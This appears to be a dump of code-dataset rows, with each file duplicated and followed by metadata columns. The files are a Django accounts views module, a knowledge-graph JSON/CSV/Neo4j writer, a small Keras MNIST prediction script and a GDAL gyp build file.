from django.contrib.auth.views import PasswordResetView as BasePasswordResetView, SuccessURLAllowedHostsMixin
from django.shortcuts import get_object_or_404, resolve_url
from django.utils.crypto import get_random_string
from django.utils.decorators import method_decorator
from django.utils.http import is_safe_url
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
from django.views.decorators.debug import sensitive_post_parameters
from django.utils.translation import gettext_lazy as _
from django.views.generic import RedirectView
from django.views.generic.edit import FormView
from django.conf import settings
from .utils import (
get_login_form, send_activation_email, get_password_reset_form, send_reset_password_email,
send_activation_change_email, is_username_disabled, get_resend_ac_form
)
from .forms import SignUpForm, ProfileEditForm, ChangeEmailForm
from .models import Activation
UserModel = get_user_model()
class SuccessRedirectView(SuccessURLAllowedHostsMixin, FormView):
redirect_field_name = REDIRECT_FIELD_NAME
def get_success_url(self):
url = self.get_redirect_url()
return url or resolve_url(settings.LOGIN_REDIRECT_URL)
def get_redirect_url(self):
redirect_to = self.request.POST.get(
self.redirect_field_name,
self.request.GET.get(self.redirect_field_name, '')
)
url_is_safe = is_safe_url(
url=redirect_to,
allowed_hosts=self.get_success_url_allowed_hosts(),
require_https=self.request.is_secure(),
)
return redirect_to if url_is_safe else ''
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs['request'] = self.request
return kwargs
class SignInView(SuccessRedirectView):
template_name = 'accounts/login.html'
form_class = get_login_form()
success_url = '/'
@method_decorator(sensitive_post_parameters('password'))
@method_decorator(csrf_protect)
@method_decorator(never_cache)
def dispatch(self, request, *args, **kwargs):
# Sets a test cookie to make sure the user has cookies enabled
request.session.set_test_cookie()
return super(SignInView, self).dispatch(request, *args, **kwargs)
def form_valid(self, form):
# If the test cookie worked, go ahead and
# delete it since its no longer needed
if self.request.session.test_cookie_worked():
self.request.session.delete_test_cookie()
login(self.request, form.get_user())
return super(SignInView, self).form_valid(form)
class SignUpView(FormView):
template_name = 'accounts/register.html'
form_class = SignUpForm
success_url = '/'
def form_valid(self, form):
user = form.save(commit=False)
if is_username_disabled():
# Set temporary username
user.username = get_random_string()
else:
user.username = form.cleaned_data.get('username')
if settings.ENABLE_USER_ACTIVATION:
user.is_active = False
user.save()
# Change the username to "user_ID" form
if is_username_disabled():
user.username = 'user_{}'.format(user.id)
user.save()
if settings.ENABLE_USER_ACTIVATION:
send_activation_email(self.request, user)
messages.add_message(self.request, messages.SUCCESS,
_('You are registered. To activate the account, follow the link sent to the mail.'))
else:
raw_password = form.cleaned_data.get('<PASSWORD>')
user = authenticate(username=user.username, password=<PASSWORD>)
login(self.request, user)
messages.add_message(self.request, messages.SUCCESS, _('You are successfully registered!'))
return super(SignUpView, self).form_valid(form)
class ActivateView(RedirectView):
permanent = False
query_string = True
pattern_name = 'index'
def get_redirect_url(self, *args, **kwargs):
assert 'code' in kwargs
act = get_object_or_404(Activation, code=kwargs['code'])
# Activate user's profile
user = act.user
user.is_active = True
user.save()
# Remove activation record, it is unneeded
act.delete()
messages.add_message(self.request, messages.SUCCESS, _('You have successfully activated your account!'))
login(self.request, user)
return super(ActivateView, self).get_redirect_url()
class ReSendActivationCodeView(SuccessRedirectView):
template_name = 'accounts/resend_activation_code.html'
form_class = get_resend_ac_form()
success_url = '/'
def form_valid(self, form):
user = form.get_user()
activation = user.activation_set.get()
activation.delete()
send_activation_email(self.request, user)
messages.add_message(self.request, messages.SUCCESS, _('A new activation code has been sent to your e-mail.'))
return super(ReSendActivationCodeView, self).form_valid(form)
class PasswordResetView(BasePasswordResetView):
form_class = get_password_reset_form()
def form_valid(self, form):
send_reset_password_email(self.request, form.get_user())
return super(PasswordResetView, self).form_valid(form)
class ProfileEditView(LoginRequiredMixin, FormView):
template_name = 'accounts/profile/edit.html'
form_class = ProfileEditForm
success_url = '/accounts/profile/edit/'
def get_initial(self):
initial = super(ProfileEditView, self).get_initial()
user = self.request.user
initial['first_name'] = user.first_name
initial['last_name'] = user.last_name
return initial
def form_valid(self, form):
user = self.request.user
user.first_name = form.cleaned_data.get('first_name')
user.last_name = form.cleaned_data.get('last_name')
user.save()
messages.add_message(self.request, messages.SUCCESS, _('Profile data has been successfully updated.'))
return super(ProfileEditView, self).form_valid(form)
class ChangeEmailView(LoginRequiredMixin, FormView):
template_name = 'accounts/profile/change_email.html'
form_class = ChangeEmailForm
success_url = '/accounts/change/email/'
def get_form_kwargs(self):
kwargs = super(ChangeEmailView, self).get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
def get_initial(self):
initial = super(ChangeEmailView, self).get_initial()
user = self.request.user
initial['email'] = user.email
return initial
def form_valid(self, form):
user = self.request.user
email = form.cleaned_data.get('email')
email = email.lower()
if hasattr(settings, 'EMAIL_ACTIVATION_AFTER_CHANGING') and settings.EMAIL_ACTIVATION_AFTER_CHANGING:
send_activation_change_email(self.request, user, email)
messages.add_message(self.request, messages.SUCCESS,
_('To complete the change of mail, click on the link sent to it.'))
else:
user.email = email
user.save()
messages.add_message(self.request, messages.SUCCESS, _('Email successfully changed.'))
return super(ChangeEmailView, self).form_valid(form)
class ChangeEmailActivateView(RedirectView):
permanent = False
query_string = True
pattern_name = 'change_email'
def get_redirect_url(self, *args, **kwargs):
assert 'code' in kwargs
act = get_object_or_404(Activation, code=kwargs['code'])
# Change user's email
user = act.user
user.email = act.email
user.save()
# Remove activation record, it is unneeded
act.delete()
messages.add_message(self.request, messages.SUCCESS, _('You have successfully changed your email!'))
return super(ChangeEmailActivateView, self).get_redirect_url()
| from django.contrib.auth import login, authenticate, REDIRECT_FIELD_NAME, get_user_model
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.auth.views import PasswordResetView as BasePasswordResetView, SuccessURLAllowedHostsMixin
from django.shortcuts import get_object_or_404, resolve_url
from django.utils.crypto import get_random_string
from django.utils.decorators import method_decorator
from django.utils.http import is_safe_url
from django.views.decorators.cache import never_cache
from django.views.decorators.csrf import csrf_protect
from django.views.decorators.debug import sensitive_post_parameters
from django.utils.translation import gettext_lazy as _
from django.views.generic import RedirectView
from django.views.generic.edit import FormView
from django.conf import settings
from .utils import (
get_login_form, send_activation_email, get_password_reset_form, send_reset_password_email,
send_activation_change_email, is_username_disabled, get_resend_ac_form
)
from .forms import SignUpForm, ProfileEditForm, ChangeEmailForm
from .models import Activation
UserModel = get_user_model()
class SuccessRedirectView(SuccessURLAllowedHostsMixin, FormView):
redirect_field_name = REDIRECT_FIELD_NAME
def get_success_url(self):
url = self.get_redirect_url()
return url or resolve_url(settings.LOGIN_REDIRECT_URL)
def get_redirect_url(self):
redirect_to = self.request.POST.get(
self.redirect_field_name,
self.request.GET.get(self.redirect_field_name, '')
)
url_is_safe = is_safe_url(
url=redirect_to,
allowed_hosts=self.get_success_url_allowed_hosts(),
require_https=self.request.is_secure(),
)
return redirect_to if url_is_safe else ''
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs['request'] = self.request
return kwargs
class SignInView(SuccessRedirectView):
template_name = 'accounts/login.html'
form_class = get_login_form()
success_url = '/'
@method_decorator(sensitive_post_parameters('password'))
@method_decorator(csrf_protect)
@method_decorator(never_cache)
def dispatch(self, request, *args, **kwargs):
# Sets a test cookie to make sure the user has cookies enabled
request.session.set_test_cookie()
return super(SignInView, self).dispatch(request, *args, **kwargs)
def form_valid(self, form):
# If the test cookie worked, go ahead and
# delete it since its no longer needed
if self.request.session.test_cookie_worked():
self.request.session.delete_test_cookie()
login(self.request, form.get_user())
return super(SignInView, self).form_valid(form)
class SignUpView(FormView):
template_name = 'accounts/register.html'
form_class = SignUpForm
success_url = '/'
def form_valid(self, form):
user = form.save(commit=False)
if is_username_disabled():
# Set temporary username
user.username = get_random_string()
else:
user.username = form.cleaned_data.get('username')
if settings.ENABLE_USER_ACTIVATION:
user.is_active = False
user.save()
# Change the username to "user_ID" form
if is_username_disabled():
user.username = 'user_{}'.format(user.id)
user.save()
if settings.ENABLE_USER_ACTIVATION:
send_activation_email(self.request, user)
messages.add_message(self.request, messages.SUCCESS,
_('You are registered. To activate the account, follow the link sent to the mail.'))
else:
raw_password = form.cleaned_data.get('<PASSWORD>')
user = authenticate(username=user.username, password=<PASSWORD>)
login(self.request, user)
messages.add_message(self.request, messages.SUCCESS, _('You are successfully registered!'))
return super(SignUpView, self).form_valid(form)
class ActivateView(RedirectView):
permanent = False
query_string = True
pattern_name = 'index'
def get_redirect_url(self, *args, **kwargs):
assert 'code' in kwargs
act = get_object_or_404(Activation, code=kwargs['code'])
# Activate user's profile
user = act.user
user.is_active = True
user.save()
# Remove activation record, it is unneeded
act.delete()
messages.add_message(self.request, messages.SUCCESS, _('You have successfully activated your account!'))
login(self.request, user)
return super(ActivateView, self).get_redirect_url()
class ReSendActivationCodeView(SuccessRedirectView):
template_name = 'accounts/resend_activation_code.html'
form_class = get_resend_ac_form()
success_url = '/'
def form_valid(self, form):
user = form.get_user()
activation = user.activation_set.get()
activation.delete()
send_activation_email(self.request, user)
messages.add_message(self.request, messages.SUCCESS, _('A new activation code has been sent to your e-mail.'))
return super(ReSendActivationCodeView, self).form_valid(form)
class PasswordResetView(BasePasswordResetView):
form_class = get_password_reset_form()
def form_valid(self, form):
send_reset_password_email(self.request, form.get_user())
return super(PasswordResetView, self).form_valid(form)
class ProfileEditView(LoginRequiredMixin, FormView):
template_name = 'accounts/profile/edit.html'
form_class = ProfileEditForm
success_url = '/accounts/profile/edit/'
def get_initial(self):
initial = super(ProfileEditView, self).get_initial()
user = self.request.user
initial['first_name'] = user.first_name
initial['last_name'] = user.last_name
return initial
def form_valid(self, form):
user = self.request.user
user.first_name = form.cleaned_data.get('first_name')
user.last_name = form.cleaned_data.get('last_name')
user.save()
messages.add_message(self.request, messages.SUCCESS, _('Profile data has been successfully updated.'))
return super(ProfileEditView, self).form_valid(form)
class ChangeEmailView(LoginRequiredMixin, FormView):
template_name = 'accounts/profile/change_email.html'
form_class = ChangeEmailForm
success_url = '/accounts/change/email/'
def get_form_kwargs(self):
kwargs = super(ChangeEmailView, self).get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
def get_initial(self):
initial = super(ChangeEmailView, self).get_initial()
user = self.request.user
initial['email'] = user.email
return initial
def form_valid(self, form):
user = self.request.user
email = form.cleaned_data.get('email')
email = email.lower()
if hasattr(settings, 'EMAIL_ACTIVATION_AFTER_CHANGING') and settings.EMAIL_ACTIVATION_AFTER_CHANGING:
send_activation_change_email(self.request, user, email)
messages.add_message(self.request, messages.SUCCESS,
_('To complete the change of mail, click on the link sent to it.'))
else:
user.email = email
user.save()
messages.add_message(self.request, messages.SUCCESS, _('Email successfully changed.'))
return super(ChangeEmailView, self).form_valid(form)
class ChangeEmailActivateView(RedirectView):
permanent = False
query_string = True
pattern_name = 'change_email'
def get_redirect_url(self, *args, **kwargs):
assert 'code' in kwargs
act = get_object_or_404(Activation, code=kwargs['code'])
# Change user's email
user = act.user
user.email = act.email
user.save()
# Remove activation record, it is unneeded
act.delete()
messages.add_message(self.request, messages.SUCCESS, _('You have successfully changed your email!'))
return super(ChangeEmailActivateView, self).get_redirect_url()
| en | 0.917576 | # Sets a test cookie to make sure the user has cookies enabled # If the test cookie worked, go ahead and # delete it since its no longer needed # Set temporary username # Change the username to "user_ID" form # Activate user's profile # Remove activation record, it is unneeded # Change user's email # Remove activation record, it is unneeded | 1.855584 | 2 |
conversationkg/kgs/writers.py | INDElab/conversationkg | 3 | 8597 | <reponame>INDElab/conversationkg<gh_stars>1-10
from ..conversations.corpus import Conversation
from ..conversations.emails import Email
from collections import Counter
import matplotlib
import pandas as pd
import json
class JSONWriter:
def __init__(self, kg):
self.kg = kg
self.entities = kg.entities()
self.triples = kg.triples
self.provenances = kg.provenances
def store(self, name, save_mapping=True):
with open(f"{name}.json", "w") as handle:
json.dump(self.translated, handle)
with open(f"{name}.provenances.json", "w") as handle:
json.dump(self.provenances, handle)
if save_mapping:
reversed_d = self.reverse_mapping(self.entity2ind)
json_d = {i:e.to_json() for i, e in reversed_d.items()}
with open(f"{name}.ind2entity.json", "w") as handle:
json.dump(json_d, handle)
reverse_d = self.reverse_mapping(self.pred2ind)
with open(f"{name}.ind2pred.json", "w") as handle:
json.dump(reverse_d, handle)
@classmethod
def restore(cls, name, load_mapping_of=None):
def get_class(cls_name):
for mod in conversations_modules:
try:
cls = getattr(mod, cls_name)
return cls
except AttributeError:
pass
raise AttributeError(f"{cls_name} could not be found in any of the modules!")
def json_to_entity(json_dict):
try:
json_dict["class"]
except KeyError:
print(json_dict.keys())
raise
cls_name = json_dict["class"]
cls = get_class(cls_name)
return cls.from_json(json_dict)
if load_mapping_of is None:
load_mapping_of = name
with open(f"{load_mapping_of}.ind2entity.json") as handle:
loaded_entity_mapping = {int(i): d for i, d in json.load(handle).items()}
ind2entity = {i:json_to_entity(d) for i, d in loaded_entity_mapping.items()}
ind2entity = {i: (Person(x) if type(x) is WholePerson else x)
for i, x in ind2entity.items()}
with open(f"{load_mapping_of}.ind2pred.json") as handle:
ind2pred = {int(i): d for i, d in json.load(handle).items()}
with open(f"{name}.json") as handle:
loaded = json.load(handle)
restored_triples = [(ind2entity[s],
ind2pred[p],
ind2entity[o]) for s, p, o in loaded]
with open(f"{name}.provenances.json") as handle:
provenances = json.load(handle)
kg = KG(restored_triples, provenances)
kg.translated = loaded
kg.entity2ind = kg.reverse_mapping(ind2entity)
kg.pred2ind = kg.reverse_mapping(ind2pred)
return kg
@staticmethod
def reverse_mapping(d):
rev_d = {}
for k, v in d.items():
if not v in rev_d:
rev_d[v] = k
else:
print("duplicate:", v)
if not type(v) is Person:
raise ValueError("Non-bijective mapping!")
return rev_d
class CSVWriter:
def __init__(self, kg):
self.kg = kg
self.entities = kg.entities()
self.triples = kg.triples
self.provenances = kg.provenances
def get_node_df(self):
records = []
sorted_ents = sorted(self.entities, key=lambda x: (str(type(x)), str(x)))
for i, e in enumerate(sorted_ents):
node_id = i # hash(e)
node_t = str(e)
node_type = type(e).__name__
node_u = f"icons/{node_type.lower()}.png"
type_ = "LinkChart" if i == 0 else "0"
if type(e) in {Conversation, Email}:
node_dtopic = e.topic.topic.index
node_dtopic_rate = round(e.topic.score, 5)
else:
node_dtopic = -1
node_dtopic_rate = 1.0
lat = lng = 0.0
records.append(
(
type_, node_type, node_id, node_u, node_t,
node_dtopic, node_dtopic_rate, lat, lng
)
)
return pd.DataFrame.from_records(records,
columns= ['type',
'node_type',
'node_id',
'node_u',
'node_t',
'node_dtopic',
'node_dtopic_rate',
'lat',
'lng']
)
def get_link_df(self):
link_types = {p for s, p, o in self.triples}
link_counts = Counter(self.triples)
colours = dict(zip(link_types, list(matplotlib.colors.cnames.values())))
sorted_ents = dict(zip(sorted(self.entities, key=str),
range(len(self.entities))))
records = []
for i, ((s, p, o), prov) in enumerate(zip(self.triples, self.provenances)):
linkId = i # hash((s, p, o)) # s.time.timestamp()
end1 = sorted_ents[s] # hash(s)
end2 = sorted_ents[o] # hash(o)
linkcount = link_counts[(s,p,o)]
linkcolor = colours[p]
linktype = p
itemID = prov
rec = [linkId,
end1,
end2,
linkcount,
linkcolor,
itemID,
linktype]
records.append(rec)
return pd.DataFrame.from_records(records,
columns=['linkId', 'end1', 'end2', 'linkcount', 'linkcolor', 'itemID', 'linktype'])
def to_csv(self, save_path):
node_df = self.get_node_df()
link_df = self.get_link_df()
node_df.to_csv(save_path + ".nodes.csv",
index=False)
link_df.to_csv(save_path + ".links.csv",
index=False)
from neo4j import GraphDatabase
class Neo4jWriter:
def __init__(self, kg):
self.kg = kg
def to_neo4j(self):
pass
def run(self, clear=True):
self.driver = GraphDatabase.driver("bolt://localhost:7687",
auth=("neo4j", "<PASSWORD>"), encrypted=False)
if clear:
tx.run("""MATCH (x)
DETACH DELETE x""")
| from ..conversations.corpus import Conversation
from ..conversations.emails import Email
from collections import Counter
import matplotlib
import pandas as pd
import json
class JSONWriter:
def __init__(self, kg):
self.kg = kg
self.entities = kg.entities()
self.triples = kg.triples
self.provenances = kg.provenances
def store(self, name, save_mapping=True):
with open(f"{name}.json", "w") as handle:
json.dump(self.translated, handle)
with open(f"{name}.provenances.json", "w") as handle:
json.dump(self.provenances, handle)
if save_mapping:
reversed_d = self.reverse_mapping(self.entity2ind)
json_d = {i:e.to_json() for i, e in reversed_d.items()}
with open(f"{name}.ind2entity.json", "w") as handle:
json.dump(json_d, handle)
reverse_d = self.reverse_mapping(self.pred2ind)
with open(f"{name}.ind2pred.json", "w") as handle:
json.dump(reverse_d, handle)
@classmethod
def restore(cls, name, load_mapping_of=None):
def get_class(cls_name):
for mod in conversations_modules:
try:
cls = getattr(mod, cls_name)
return cls
except AttributeError:
pass
raise AttributeError(f"{cls_name} could not be found in any of the modules!")
def json_to_entity(json_dict):
try:
json_dict["class"]
except KeyError:
print(json_dict.keys())
raise
cls_name = json_dict["class"]
cls = get_class(cls_name)
return cls.from_json(json_dict)
if load_mapping_of is None:
load_mapping_of = name
with open(f"{load_mapping_of}.ind2entity.json") as handle:
loaded_entity_mapping = {int(i): d for i, d in json.load(handle).items()}
ind2entity = {i:json_to_entity(d) for i, d in loaded_entity_mapping.items()}
ind2entity = {i: (Person(x) if type(x) is WholePerson else x)
for i, x in ind2entity.items()}
with open(f"{load_mapping_of}.ind2pred.json") as handle:
ind2pred = {int(i): d for i, d in json.load(handle).items()}
with open(f"{name}.json") as handle:
loaded = json.load(handle)
restored_triples = [(ind2entity[s],
ind2pred[p],
ind2entity[o]) for s, p, o in loaded]
with open(f"{name}.provenances.json") as handle:
provenances = json.load(handle)
kg = KG(restored_triples, provenances)
kg.translated = loaded
kg.entity2ind = kg.reverse_mapping(ind2entity)
kg.pred2ind = kg.reverse_mapping(ind2pred)
return kg
@staticmethod
def reverse_mapping(d):
rev_d = {}
for k, v in d.items():
if not v in rev_d:
rev_d[v] = k
else:
print("duplicate:", v)
if not type(v) is Person:
raise ValueError("Non-bijective mapping!")
return rev_d
class CSVWriter:
def __init__(self, kg):
self.kg = kg
self.entities = kg.entities()
self.triples = kg.triples
self.provenances = kg.provenances
def get_node_df(self):
records = []
sorted_ents = sorted(self.entities, key=lambda x: (str(type(x)), str(x)))
for i, e in enumerate(sorted_ents):
node_id = i # hash(e)
node_t = str(e)
node_type = type(e).__name__
node_u = f"icons/{node_type.lower()}.png"
type_ = "LinkChart" if i == 0 else "0"
if type(e) in {Conversation, Email}:
node_dtopic = e.topic.topic.index
node_dtopic_rate = round(e.topic.score, 5)
else:
node_dtopic = -1
node_dtopic_rate = 1.0
lat = lng = 0.0
records.append(
(
type_, node_type, node_id, node_u, node_t,
node_dtopic, node_dtopic_rate, lat, lng
)
)
return pd.DataFrame.from_records(records,
columns= ['type',
'node_type',
'node_id',
'node_u',
'node_t',
'node_dtopic',
'node_dtopic_rate',
'lat',
'lng']
)
def get_link_df(self):
link_types = {p for s, p, o in self.triples}
link_counts = Counter(self.triples)
colours = dict(zip(link_types, list(matplotlib.colors.cnames.values())))
sorted_ents = dict(zip(sorted(self.entities, key=str),
range(len(self.entities))))
records = []
for i, ((s, p, o), prov) in enumerate(zip(self.triples, self.provenances)):
linkId = i # hash((s, p, o)) # s.time.timestamp()
end1 = sorted_ents[s] # hash(s)
end2 = sorted_ents[o] # hash(o)
linkcount = link_counts[(s,p,o)]
linkcolor = colours[p]
linktype = p
itemID = prov
rec = [linkId,
end1,
end2,
linkcount,
linkcolor,
itemID,
linktype]
records.append(rec)
return pd.DataFrame.from_records(records,
columns=['linkId', 'end1', 'end2', 'linkcount', 'linkcolor', 'itemID', 'linktype'])
def to_csv(self, save_path):
node_df = self.get_node_df()
link_df = self.get_link_df()
node_df.to_csv(save_path + ".nodes.csv",
index=False)
link_df.to_csv(save_path + ".links.csv",
index=False)
from neo4j import GraphDatabase
class Neo4jWriter:
def __init__(self, kg):
self.kg = kg
def to_neo4j(self):
pass
def run(self, clear=True):
self.driver = GraphDatabase.driver("bolt://localhost:7687",
auth=("neo4j", "<PASSWORD>"), encrypted=False)
if clear:
tx.run("""MATCH (x)
DETACH DELETE x""") | en | 0.117977 | # hash(e) # hash((s, p, o)) # s.time.timestamp() # hash(s) # hash(o) MATCH (x) DETACH DELETE x | 2.450925 | 2 |
model-test.py | shikew/Handwriting-calculator | 0 | 8598 | import numpy as np
from PIL import Image
from keras.models import load_model
img_gray = Image.open('1002.png')
number = np.array(img_gray)
print(number.shape)
print('准备的图片的shape:',number.flatten().shape)
print('原number:',number)
number = number.astype('float32')
number = number/255 #归一化
number = number.flatten()
print('处理过后的number.shape:',number.shape)
model = load_model('mnist-dnn.h5')
# model.load_weights('mnist.model.best.hdf5')
# def recognize(photo_data):
# return clf.predict(photo_data)
print(model.predict_classes(np.array([number])))
#print('测试标签为:',test_target[8000]) | import numpy as np
from PIL import Image
from keras.models import load_model
img_gray = Image.open('1002.png')
number = np.array(img_gray)
print(number.shape)
print('准备的图片的shape:',number.flatten().shape)
print('原number:',number)
number = number.astype('float32')
number = number/255 #归一化
number = number.flatten()
print('处理过后的number.shape:',number.shape)
model = load_model('mnist-dnn.h5')
# model.load_weights('mnist.model.best.hdf5')
# def recognize(photo_data):
# return clf.predict(photo_data)
print(model.predict_classes(np.array([number])))
#print('测试标签为:',test_target[8000]) | ja | 0.124041 | #归一化 # model.load_weights('mnist.model.best.hdf5') # def recognize(photo_data): # return clf.predict(photo_data) #print('测试标签为:',test_target[8000]) | 3.317003 | 3 |
deps/libgdal/gyp-formats/ogr_mem.gyp | khrushjing/node-gdal-async | 42 | 8599 | <gh_stars>10-100
{
"includes": [
"../common.gypi"
],
"targets": [
{
"target_name": "libgdal_ogr_mem_frmt",
"type": "static_library",
"sources": [
"../gdal/ogr/ogrsf_frmts/mem/ogrmemdatasource.cpp",
"../gdal/ogr/ogrsf_frmts/mem/ogrmemlayer.cpp",
"../gdal/ogr/ogrsf_frmts/mem/ogrmemdriver.cpp"
],
"include_dirs": [
"../gdal/ogr/ogrsf_frmts/mem"
]
}
]
}
| {
"includes": [
"../common.gypi"
],
"targets": [
{
"target_name": "libgdal_ogr_mem_frmt",
"type": "static_library",
"sources": [
"../gdal/ogr/ogrsf_frmts/mem/ogrmemdatasource.cpp",
"../gdal/ogr/ogrsf_frmts/mem/ogrmemlayer.cpp",
"../gdal/ogr/ogrsf_frmts/mem/ogrmemdriver.cpp"
],
"include_dirs": [
"../gdal/ogr/ogrsf_frmts/mem"
]
}
]
} | none | 1 | 0.936372 | 1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.